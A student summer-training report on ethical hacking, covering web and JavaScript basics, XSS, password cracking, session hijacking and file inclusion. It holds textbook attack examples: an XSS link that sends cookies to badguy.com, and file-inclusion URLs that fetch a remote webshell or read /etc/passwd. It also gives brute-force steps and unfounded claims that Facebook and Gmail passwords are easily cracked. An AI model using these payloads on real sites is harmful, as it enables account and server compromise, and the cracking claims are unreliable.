Upload
badd-man
View
215
Download
0
Tags:
Embed Size (px)
DESCRIPTION
good report
Citation preview
SUMMER TRAINING
REPORT
SUBMITTED BY:-
DEVPRIYO RAY
CSE-A, 3RD YEAR (VTH SEMESTER)
REG. NO-1031330059
INTRODUCTION
ANONYMOUS
As for the literal operation of Anonymous, becoming
part of it is as simple as going onto its Internet Relay
Chat forums and typing away.
The real-life people involved in Anonymous could be
behind their laptops anywhere, from an Internet café
in Malaysia to a Michigan suburb.
Anonymous appears to have no spokesperson or
leader.
One could participate for a minute or a day in a chat
room, and then never go back again.
Anonymous is the future form of Internet-based
social activism. They laud the "hactivists" for their
actions.
WHY DO PEOPLE HACK?
To make security stronger ( Ethical Hacking )
Just for fun
Show off
Hack other systems secretly
Notify many people their thought
Steal important information
Destroy enemy’s computer network during the
war
WHAT IS ETHICAL HACKING?
Also Called – Attack & Penetration Testing, White-hat
hacking, Red Teaming;
• It is Legal
• Permission is obtained from the target
• Part of an overall security program
• Identify vulnerabilities visible from the
Internet
Ethical hackers possesses same skills, mindset and
tools of a hacker but the attacks are done in a non-
destructive manner
Hacking
Process of breaking into systems for:
Personal or Commercial Gains
Malicious Intent – Causing severe damage to
Information & Assets
Conforming to accepted professional
standards of conduct
TYPES OF HACKERS
White Hat Hackers:
A White Hat who specializes in penetration testing
and in other testing methodologies to ensure the
security of an organization's information systems.
Black Hat Hackers:
A Black Hat is the villain or bad guy, especially in a
western movie in which such a character would
stereotypically wear a black hat in contrast to the
hero's white hat.
Grey Hat Hackers:
A Grey Hat, in the hacking community, refers to a
skilled hacker whose activities fall somewhere
between white and black hat hackers on a variety of
spectra
Why Can’t We Defend Against Hackers?
There are many unknown unsecure holes in the
system
Hackers need to know only one loophole in the
system
Administrator needs to know all the loopholes to
defend the system
Why Do We Need Ethical Hacking?
TYPES OF ATTACKS
Various kinds of possible attacks on a computer
system are:-
Denial of service attack
Brute force attack
Cross site scripting (XSS)
File inclusions (or file upload), and many more.
WEB BASICS AND SECURITY
WEB APPLICATIONS:
Big trend: software as a (Web-based) service
Online banking, shopping, government, bill
payment, tax prep, customer relationship
management, etc.
Cloud computing
Applications hosted on Web servers
Written in a mixture of PHP, Java, Perl, Python, C,
ASP
Security is rarely the main concern
Poorly written scripts with inadequate input
validation
Sensitive data stored in world-readable files
Recent push from Visa and MasterCard to improve
security of data management (PCI standard)
TYPICAL WEB APPLICATION DESIGN:
A web application is designed keeping in mind the
following things:
Runs on a Web server or application server
Takes input from Web users (via Web server)
Interacts with back-end databases and third parties
Prepares and outputs results for users (via Web
server)
• Dynamically generated HTML pages
• Contain content from many different
sources, often including regular users
– Blogs, social networks, photo-sharing
websites…
BROWSER AND NETWORK:
A browser basically interacts with the network. It
sends a request to the network according to the
need of the user (using the GET method). The reply
concerning the request send is displayed on the
browser (using POST method).
BASIC EXECUTION MODEL OF A BROWSER:
Each browser window or frame:
• Loads content
• Renders
– Processes HTML and scripts to display
the page
– May involve images, subframes, etc.
• Responds to events
Events
• User actions: OnClick, OnMouseover
• Rendering: OnLoad
• Timing: setTimeout(), clearTimeout()
HTML AND SCRIPTS:
EXAMPLE
<html>
…
<p> The script on this page adds two numbers
<script>
var num1, num2, sum
num1 = prompt("Enter first number")
num2 = prompt("Enter second number")
sum = parseInt(num1) + parseInt(num2)
alert("Sum = " + sum)
</script>
…
</html>
EVENT DRIVEN SCRIPT EXECUTION:
EXAMPLE
<script type="text/javascript">
function whichButton(event) {
if (event.button==1) {
alert("You clicked the left mouse button!") }
else {
alert("You clicked the right mouse button!")
}}
</script>
…
<body onmousedown="whichButton(event)">
…
</body>
OUTPUT:
JAVASCRIPT:
Language executed by browser
• Scripts are embedded in Web pages
• Can run before HTML is loaded, before
page is viewed, while it is being viewed or
when leaving the page
Used to implement “active” web pages
• AJAX, huge number of Web-based
applications
Attacker gets to execute code on user’s machine
• Often used to exploit other vulnerabilities
“The world’s most misunderstood programing
language”
JAVASCRIPT IN WEBPAGES:
Embedded in HTML page as <script> element
• JavaScript written directly inside <script>
element
– <script> alert("Hello World!") </script>
• Linked file as src attribute of the <script>
element
<script type="text/JavaScript"
src=“functions.js"></script>
Event handler attribute
<a href="http://www.yahoo.com"
onmouseover="alert('hi');">
Pseudo-URL referenced by a link
<a href=“JavaScript: alert(‘You clicked’);”>Click
me</a>
JAVASCRIPT SECURITY MODEL:
Script runs in a “sandbox”
• No direct file access, restricted network
access
Same-origin policy
• Can only read properties of documents and
windows from the same server, protocol,
and port
• If the same server hosts unrelated sites,
scripts from one site can access document
properties on the other
User can grant privileges to signed scripts
• UniversalBrowserRead/Write,
UniversalFileRead, UniversalSendMail
REMOTE SCRIPTING:
Goal: exchange data between client-side app in a
browser and server-side app (w/o reloading page)
Methods
• Java applet or ActiveX control or Flash
– Can make HTTP requests and interact with client-
side JavaScript code, but requires LiveConnect
(not available on all browsers)
• XML-RPC
– Open, standards-based technology that requires
XML-RPC libraries on your server and in client-
side code
• Simple HTTP via a hidden IFRAME
– IFRAME with a script on your web server (or
database of static HTML files) is by far the easiest
remote scripting option
REMOTE SCRIPTING EXAMPLE:
client.html: pass arguments to server.html
<script type="text/javascript">
function handleResponse() { alert('this function is called from
server.html') }
</script>
<iframe id="RSIFrame" name="RSIFrame"
style="width:0px; height:0px; border: 0px"
src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>
server.html: could be PHP app, anything
<script type="text/javascript">
window.parent.handleResponse()
</script>
CROSS SITE SCRIPTING(XSS)
WHAT IS XSS ?
An XSS vulnerability is present when an attacker can
inject scripting code into pages generated by a web
application.
Methods for injecting malicious code:
Reflected XSS (“type 1”)
the attack script is reflected back to the user as
part of a page from the victim site
Stored XSS (“type 2”)
the attacker stores the malicious code in a
resource managed by the web application, such
as a database
Others, such as DOM-based attacks
XSS EXAMPLE:
search field on victim.com:
http://victim.com/search.php ? term = apple
server-side implementation of search.php:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET[term] ?> (echo search term in response)
. . .
</BODY> </HTML>
Now consider the link
“http://victim.com/search.php ? term =
<script> window.open(
“http://badguy.com?cookie = ” +
document.cookie ) </script>”
What if user clicks on this link?
1. Browser goes to victim.com/search.php
2. Victim.com returns
<HTML> Results for <script> … </script>
1. Browser executes script:
Sends badguy.com cookie for victim.com
OUTPUT:
REFLECTED XSS:
STORED XSS:
CRACKING
Cracking is the procedure of knowing passwords of
certain documents, files, etc. using illegal means.
However, in case of penetration testing, cracking is
not illegal, it is done with the consent of the
required authorities.
Various methods are used to crack passwords like
brute force attack, dictionary attack, social
engineering, etc.
EXAMPLE OF BRUTE FORCE ATTACK USING
FIREFORCE:
Fireforce is an add on used in Mozilla Firefox for
cracking passwords. After installing this add on ,
the following procedure is followed:
Launching the attack:
We want the password for the user ‘admin’.
1) Fill the username section with ‘admin’
2) Right click in the Password field and select:
Fireforce> Generate Password > specify the
type of password.
3) Enter the minimum length
4) Enter the maximum length
5) Enter the text that identifies the failed
authentication
6) Enter the no. request per second
Click on save and the passwords will be generated.
Using a little imagination, all the Facebook passwords can be
cracked, but it largely depends upon the computing power of
the CPU.
However, this method cannot be applied to crack Gmail
passwords. Gmail passwords, however, can be simply cracked
using dictionary attack, which in turn requires a lot of
computing power and is way beyond the scope of a normal PC.
SESSION HIJACKING
Session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer session—sometimes also called asession key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer .
A popular method is using source-routed IP packets. This allows an attacker at point B on the network to participate in a conversation between A and C by encouraging the IP packets to pass through B's machine.
If source-routing is turned off, the attacker can use "blind" hijacking, whereby it guesses the responses of the two machines. Thus, the attacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net.
METHODS OF SESSION HIJACKING:
Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSLencryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.
Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.
Malware and unwanted programs can use browser hijacking to steal a browser's cookie files without a user's knowledge, and then perform actions (like installing Android apps) without the user's knowledge. An attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server.
FILE INCLUSION
File inclusion vulnerability is a type of vulnerability most often found on websites. It allows an attacker to include a file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file or more serious events such as:
Code execution on the web server
Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
Denial of service (DoS)
Data theft/manipulation
TYPES OF INCLUSION:
1) REMOTE FILE INCLUSION 2) LOCAL FILE INCLUSION
EXAMPLE: Consider this PHP script which includes a file specified by request:
<?php
if ( isset( $_GET['COLOR'] ) ) {
include( $_GET['COLOR'] . '.php' );
}
?>
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
The developer intended only blue.php and red.php to be used as options. But it is possible to inject code from other files as anyone can insert arbitrary values
for the COLOR parameter.
/vulnerable.php?COLOR=http://evil.example.co
m/webshell.txt? - injects a remotely hosted file
containing a malicious code.
/vulnerable.php?COLOR=C:\\ftp\\upload\\expl
oit - Executes code from an already uploaded file
called exploit.php (local file inclusion vulnerability)
/vulnerable.php?COLOR=C:\\notes.txt%00 -
example using NULL meta character to remove
the .php suffix, allowing access to files other
than .php. (Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator)
/vulnerable.php?COLOR=/etc/passwd%00 -
allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.